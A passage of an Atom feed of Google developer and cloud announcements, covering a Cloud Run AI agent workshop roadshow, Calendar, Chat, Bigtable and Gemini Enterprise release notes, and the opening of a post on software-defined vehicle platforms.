    <id>https://cloud.google.com/blog/topics/developers-practitioners/google-cloud-labs-accelerate-ai-with-cloud-run</id>
    <title>Google Cloud Labs: Accelerate AI with Cloud Run</title>
    <updated>2026-07-07T14:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Moving Beyond the Prototype&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The AI landscape has shifted. While "vibe coding" with tools like Antigravity and AI Studio lets you build and deploy complex agents in minutes, the real work begins on "Day 2". Moving from a magical prototype to a hardened, production-grade application requires professional AI engineering. We’re excited to bring back the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Accelerate AI with Cloud Run roadshow&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for 2026. This year, we’ve updated our curriculum to focus on the full AI agent lifecycle, giving you the keys to productionizing and scaling agentic workloads on Google Cloud’s serverless platform.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;The Coffee Shop Journey: A Hands-On Experience&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Experience the ease of building advanced AI agents on Cloud Run through 'The Coffee Shop Journey'. This interactive session is designed to guide you through the full lifecycle of an AI agent, moving beyond prototyping to focus on real business use cases. You will solve real-world business problems as you evolve from launching a simple cafe to building complex, intelligent assistants.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our curriculum covers the core pillars of modern AI development:&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;The Basics:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Gain familiarity with Cloud Run by deploying a simple web app (a Coffee Shop launch scenario) to understand the platform fundamentals.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Build a Coffee Recommendation Agent:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Create a personalized AI assistant using Google's Agent Development Kit (ADK) and Retrieval-Augmented Generation (RAG).&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Optimize Coffee Stand Locations:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Use Gemma 4 and the BigQuery MCP server to identify the most profitable locations for new coffee stands by analyzing popular bike routes.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Personal Productivity Assistant for Store Managers:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Create a personal productivity assistant using Cloud Run to help a coffee shop manager with daily operational tasks and scheduling.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Master Advanced Features with Antigravity 2.0:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Learn how to use skills, context, rules, and hooks with Antigravity 2.0 to build new features for your Cloud Run applications.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Production-Grade AI on Cloud Run&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Get first-hand experience with the platform innovations that make Cloud Run the ideal home for production-grade agentic workloads. Through hands-on exercises, you will learn to build, scale, and orchestrate&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; long-running agents &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;using Google's ADK and Antigravity 2.0. Additionally, you will utilize BigQuery MCP for automated, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;data-driven expansion strategies,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; and experience low-latency inference for frontier models using &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Cloud Run’s GPU offerings &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;without the traditional overhead of cluster management.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_9rcEfTb.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Ready to Build for Scale? Join us in North America&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Don't just witness the AI revolution - build it. Find the workshop in your city and secure your spot today! Let's transform your AI journey from a simple prototype into a powerful, production reality.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1" style="border-collapse: collapse; width: 100%; height: 316.687px;"&gt;
&lt;tbody&gt;
&lt;tr style="height: 22.3906px;"&gt;
&lt;td style="width: 31.4907%; text-align: center; vertical-align: middle; height: 22.3906px;"&gt;&lt;span style="color: #202124;"&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;City&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; text-align: center; vertical-align: middle; height: 22.3906px;"&gt;&lt;span style="color: #202124;"&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Date&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; text-align: center; vertical-align: middle; height: 22.3906px;"&gt;&lt;span style="color: #202124;"&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Registration Link&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 137.562px;"&gt;
&lt;td style="width: 31.4907%; height: 137.562px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Atlanta, GA (as a part of Atlanta Tech week)&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; height: 137.562px;"&gt;&lt;span style="vertical-align: baseline;"&gt;August 12-13&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; height: 137.562px;"&gt;
&lt;p&gt;&lt;a href="https://www.renderatl.com/tickets" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;https://www.renderatl.com/tickets&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Event tickets grant access to the workshops on a first-come, first-served basis.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3906px;"&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Sunnyvale, CA&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;August 13&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;a href="https://rsvp.withgoogle.com/events/google-cloud-labs-accelerate-ai-on-cloud-run-sunnyvale" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Register now!&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3906px;"&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Toronto, Canada&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;August 27&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;a href="https://rsvp.withgoogle.com/events/google-cloud-labs-accelerate-ai-on-cloud-run-toronto" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Register now!&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3906px;"&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Seattle, WA&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;September&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Registration opens late July!&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3906px;"&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;New York City, NY&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;October&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Registration opens late July!&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3906px;"&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Los Angeles, CA&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;November&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Registration opens late July!&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3906px;"&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Boston, MA&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;October&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Registration opens late July!&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 22.3906px;"&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Washington D.C.&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;October&lt;/span&gt;&lt;/td&gt;
&lt;td style="width: 31.4907%; height: 22.3906px;"&gt;&lt;span style="vertical-align: baseline;"&gt;Registration opens late July!&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong&gt;Registration Update: &lt;/strong&gt;Links for our &lt;strong&gt;September&lt;/strong&gt;, &lt;strong&gt;October&lt;/strong&gt;, and &lt;strong&gt;November&lt;/strong&gt; workshops will be added to this page in &lt;strong&gt;late July.&lt;/strong&gt; Stay tuned!&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/google-cloud-labs-accelerate-ai-with-cloud-run" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-07T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://googlecloudpresscorner.com/2026-07-07-Accenture-Edge-and-Google-Cloud-Bring-Scalable-Agentic-AI-Solutions-to-Mid-Market-Companies</id>
    <title>Accenture Edge and Google Cloud Bring Scalable Agentic AI Solutions to Mid-Market Companies</title>
    <updated>2026-07-07T13:00:00+00:00</updated>
    <link href="https://googlecloudpresscorner.com/2026-07-07-Accenture-Edge-and-Google-Cloud-Bring-Scalable-Agentic-AI-Solutions-to-Mid-Market-Companies" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-07-07T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/technology/developers-tools/expanding-managed-agents-gemini-api</id>
    <title>Expanding Managed Agents in Gemini API:  background tasks, remote MCP and more</title>
    <updated>2026-07-07T08:54:00+00:00</updated>
    <content type="html">Managed agents feature bundle launch</content>
    <link href="https://blog.google/innovation-and-ai/technology/developers-tools/expanding-managed-agents-gemini-api" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-07T08:54:00+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/workspace/calendar/docs/release-notes#July_07_2026</id>
    <title>Calendar API — July 07, 2026</title>
    <updated>2026-07-07T07:00:00+00:00</updated>
    <content type="html">&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally available:&lt;/strong&gt; We are introducing a new calendar access level: &lt;code&gt;writerWithoutPrivateAccess&lt;/code&gt;. This new level permits read and write access to events that aren't private on a calendar, and shows private events as busy blocks. Users with this role cannot modify or see details for private events.&lt;/p&gt;
&lt;p&gt;For more details, see the &lt;a href="https://developers.google.com/workspace/calendar/api/v3/reference/acl"&gt;ACL resource documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;To ensure consistent visibility across recurring events, changing the visibility of a single instance in the Google Calendar API can affect all instances of the series:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;More restrictive changes propagate:&lt;/strong&gt; If you change the visibility of one instance of a recurring event to a more restrictive setting (for example, from &lt;code&gt;public&lt;/code&gt; to &lt;code&gt;private&lt;/code&gt;), the change is propagated to all instances of the recurring event.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Less restrictive changes are ignored:&lt;/strong&gt; If you attempt to change the visibility of one instance of a recurring event to a less restrictive setting (for example, from &lt;code&gt;private&lt;/code&gt; to &lt;code&gt;public&lt;/code&gt;), the change is ignored and the visibility remains unchanged. To make a recurring event less restrictive, you must update the parent recurring event.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, see &lt;a href="https://developers.google.com/workspace/calendar/api/concepts/sharing"&gt;Share calendars and events&lt;/a&gt; and the &lt;a href="https://developers.google.com/workspace/calendar/api/v3/reference/events"&gt;&lt;code&gt;events&lt;/code&gt; resource reference&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally Available:&lt;/strong&gt; The Google Calendar API now provides full support for custom labels and colors, allowing users to categorize events with a flexible palette beyond the previously fixed set of colors.&lt;/p&gt;
&lt;p&gt;You can now list and modify labels on a calendar using the &lt;a href="https://developers.google.com/workspace/calendar/api/v3/reference/calendars#labelProperties"&gt;&lt;code&gt;labelProperties&lt;/code&gt;&lt;/a&gt; on the &lt;code&gt;Calendars&lt;/code&gt; resource.&lt;/p&gt;
&lt;p&gt;Then, you can assign a label to an event by setting the ID of the label to &lt;a href="https://developers.google.com/workspace/calendar/api/v3/reference/events#eventLabelId"&gt;&lt;code&gt;eventLabelId&lt;/code&gt;&lt;/a&gt; on the &lt;code&gt;Events&lt;/code&gt; resource.&lt;/p&gt;
&lt;p&gt;Note that, in order to enable the labels feature, you must set the &lt;code&gt;eventLabelVersion&lt;/code&gt; request parameter to &lt;code&gt;1&lt;/code&gt; on &lt;a href="https://developers.google.com/workspace/calendar/api/v3/reference/events/import#eventLabelVersion"&gt;&lt;code&gt;import&lt;/code&gt;&lt;/a&gt;, &lt;a href="https://developers.google.com/workspace/calendar/api/v3/reference/events/insert#eventLabelVersion"&gt;&lt;code&gt;insert&lt;/code&gt;&lt;/a&gt;, &lt;a href="https://developers.google.com/workspace/calendar/api/v3/reference/events/patch#eventLabelVersion"&gt;&lt;code&gt;patch&lt;/code&gt;&lt;/a&gt; and &lt;a href="https://developers.google.com/workspace/calendar/api/v3/reference/events/update#eventLabelVersion"&gt;&lt;code&gt;update&lt;/code&gt;&lt;/a&gt; operations on Events resources.&lt;/p&gt;
&lt;p&gt;To learn more, see the &lt;a href="https://developers.google.com/workspace/calendar/api/guides/labels"&gt;Manage custom labels and colors guide&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://developers.google.com/workspace/calendar/docs/release-notes#July_07_2026" rel="alternate"/>
    <category term="Calendar API"/>
    <published>2026-07-07T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/workspace/release-notes#July_07_2026</id>
    <title>Workspace Release Notes — July 07, 2026</title>
    <updated>2026-07-07T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Chat API&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally Available:&lt;/strong&gt; You can now use the Google Chat API to read and update a user's &lt;a href="https://support.google.com/chat/answer/9093489"&gt;availability in Google Chat&lt;/a&gt;. The following methods are supported on the &lt;a href="https://developers.google.com/workspace/chat/api/reference/rest/v1/users.availability"&gt;&lt;code&gt;users.availability&lt;/code&gt;&lt;/a&gt; resource:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://developers.google.com/workspace/chat/api/reference/rest/v1/users.availability/get"&gt;&lt;code&gt;get&lt;/code&gt;&lt;/a&gt;: Gets a user's availability, including their presence and custom status.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://developers.google.com/workspace/chat/api/reference/rest/v1/users.availability/patch"&gt;&lt;code&gt;patch&lt;/code&gt;&lt;/a&gt;: Updates a user's custom status (with optional emoji and expiration time).&lt;/li&gt;
&lt;li&gt;&lt;a href="https://developers.google.com/workspace/chat/api/reference/rest/v1/users.availability/markAsActive"&gt;&lt;code&gt;markAsActive&lt;/code&gt;&lt;/a&gt;: Sets a user's presence state to active.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://developers.google.com/workspace/chat/api/reference/rest/v1/users.availability/markAsAway"&gt;&lt;code&gt;markAsAway&lt;/code&gt;&lt;/a&gt;: Sets a user's presence state to away.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://developers.google.com/workspace/chat/api/reference/rest/v1/users.availability/markAsDoNotDisturb"&gt;&lt;code&gt;markAsDoNotDisturb&lt;/code&gt;&lt;/a&gt;: Sets a user's presence state to do not disturb.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Additionally, Google Chat apps can subscribe to user availability updates using the Google Workspace Events API. The &lt;code&gt;google.workspace.chat.availability.v1.updated&lt;/code&gt; event type is supported.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://developers.google.com/workspace/chat/manage-user-availability"&gt;Manage user availability for Chat apps&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://developers.google.com/workspace/release-notes#July_07_2026" rel="alternate"/>
    <category term="Workspace Release Notes"/>
    <published>2026-07-07T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_07_2026</id>
    <title>Cloud Release Notes — July 07, 2026</title>
    <updated>2026-07-07T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;App Engine standard environment Java&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;To modernize image processing, &lt;a href="https://docs.cloud.google.com/appengine/migration-center/standard/java/images-to-cloud-run"&gt;migrate from the App Engine Images service to
Cloud Run&lt;/a&gt; by
routing calls to a Cloud Run image transformation service while your app
continues to run on App Engine (Preview).&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;App Engine standard environment Python&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;To modernize image processing, &lt;a href="https://docs.cloud.google.com/appengine/migration-center/standard/python/images-to-cloud-run"&gt;migrate from the App Engine Images service to
Cloud Run&lt;/a&gt; by
routing calls to a Cloud Run image transformation service while your app
continues to run on App Engine (Preview).&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Bigtable&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can bind existing &lt;a href="https://docs.cloud.google.com/bigtable/docs/tags"&gt;tags&lt;/a&gt; to Bigtable instances when you
create an instance and use policies to enforce mandatory tag assignments. This
feature is &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;generally available (GA)&lt;/a&gt;.
For more information, see &lt;a href="https://docs.cloud.google.com/bigtable/docs/creating-instance"&gt;Create an instance&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;The Bigtable agent skill (&lt;code&gt;bigtable-basics&lt;/code&gt;) is
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;generally available (GA)&lt;/a&gt;
in the public &lt;a href="https://github.com/google/skills/tree/main/skills/cloud/bigtable-basics"&gt;Google Agent Skills repository&lt;/a&gt;.
This skill lets you equip AI agents with capabilities for Bigtable tasks, such as
provisioning instances and tables, designing schemas, querying data using
GoogleSQL and key-value APIs, and diagnosing performance issues or hotspots.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can use Organization Policy Service custom constraints to manage specific
operations on continuous materialized views. This feature is &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;generally available
(GA)&lt;/a&gt;.
For more information, see &lt;a href="https://docs.cloud.google.com/bigtable/docs/custom-constraints"&gt;Use custom organization policies&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud SDK&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h2 id="57501_2026-07-07"&gt;575.0.1 (2026-07-07)&lt;/h2&gt;
&lt;h3 id="google_cloud_cli"&gt;Google Cloud CLI&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Updated Windows bundled Python for the &lt;code&gt;gcloud&lt;/code&gt; CLI to 3.14.6 to resolve CVE-2026-34182.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Subscribe to these release notes at &lt;a href="https://groups.google.com/forum/#!forum/google-cloud-sdk-announce"&gt;https://groups.google.com/forum/#!forum/google-cloud-sdk-announce&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Gemini Enterprise&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Gemini Enterprise: Managed organization policy constraints for data connectors (GA)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;You can now use managed organization policy constraints to secure and control your data connectors in Gemini Enterprise.&lt;/p&gt;
&lt;p&gt;With this release, the following constraints are generally available (GA):
* &lt;strong&gt;Restrict allowed data sources&lt;/strong&gt;: Use this policy to control which external data sources (such as Jira, Box, or Confluence) are permitted when adding a data store. For more information, see &lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/configure-allowed-data-sources"&gt;Configure allowed data sources&lt;/a&gt;.
* &lt;strong&gt;Restrict allowed egress FQDNs&lt;/strong&gt;: Use this policy to control the egress fully qualified domain names (FQDNs) that your data stores can connect to. For more information, see &lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/configure-allowed-egress-fqdns"&gt;Configure allowed egress FQDNs for data stores&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;For an overview of these policies and how they interact, see &lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/connectors/managed-policy-constraints-overview"&gt;Overview of managed policy constraints&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_07_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-07T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/search/blog/2026/07/search-console-social-video-platforms</id>
    <title>See how content from social and video platforms performs on Google Search</title>
    <updated>2026-07-07T00:00:00+00:00</updated>
    <content type="html">&lt;p&gt;
      Content creators and publishers use many channels beyond their own websites to reach their audiences.
  As people gravitate toward firsthand perspectives and different content formats, we want to make
  it easier for site owners and creators&amp;amp;mdash;even those without their own website&amp;amp;mdash;to get a consolidated view
  of how all of their content is getting discovered on Search.
      &lt;/p&gt;</content>
    <link href="https://developers.google.com/search/blog/2026/07/search-console-social-video-platforms" rel="alternate"/>
    <category term="Search Central"/>
    <published>2026-07-07T00:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/shift-into-high-gear-with-agents-securing-the-software-defined-vehicle</id>
    <title>Shift into high gear with agents: Securing the software-defined vehicle</title>
    <updated>2026-07-06T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The automotive industry is at a pivotal crossroads as it hits the gas on adopting new technology. The era of the traditional connected vehicle has shifted into the age of the software-defined vehicle (SDV), notable for rapid innovation with many new capabilities delivered over the air.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By integrating AI and agents, the next generation of SDVs will be capable of turning raw telemetry into actionable insights in real-time, allowing for a fundamental rethink of &lt;/span&gt;&lt;a href="https://blog.google/products-and-platforms/platforms/android/android-automotive-os/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;how vehicles interact with their environment and their users&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. To better support and secure SDVs, Google Cloud and &lt;/span&gt;&lt;a href="https://www.valtech.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Valtech&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; have partnered to develop &lt;/span&gt;&lt;a href="https://nexus-sdv.io/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Nexus SDV&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a highly-scalable, AI-enabled connected vehicle platform built on Google Cloud. This modular, developer-friendly and open-source solution is designed to manage up to 100 million devices, and features deep integration with &lt;/span&gt;&lt;a href="https://source.android.com/docs/automotive" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Android Automotive OS&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (AAOS) to streamline data flows and in-vehicle experiences. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are proud to announce the first release of the &lt;/span&gt;&lt;a href="https://github.com/googlecloudplatform/nexus-sdv" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Nexus SDV&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; open-source core that showcases how it can reduce total cost of ownership through Arm-based compute and Bigtable, while providing a AI-native environment for building the next era of automotive intelligence.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;AI-driven experiences with Nexus SDV &lt;/strong&gt;&lt;/h3&gt;
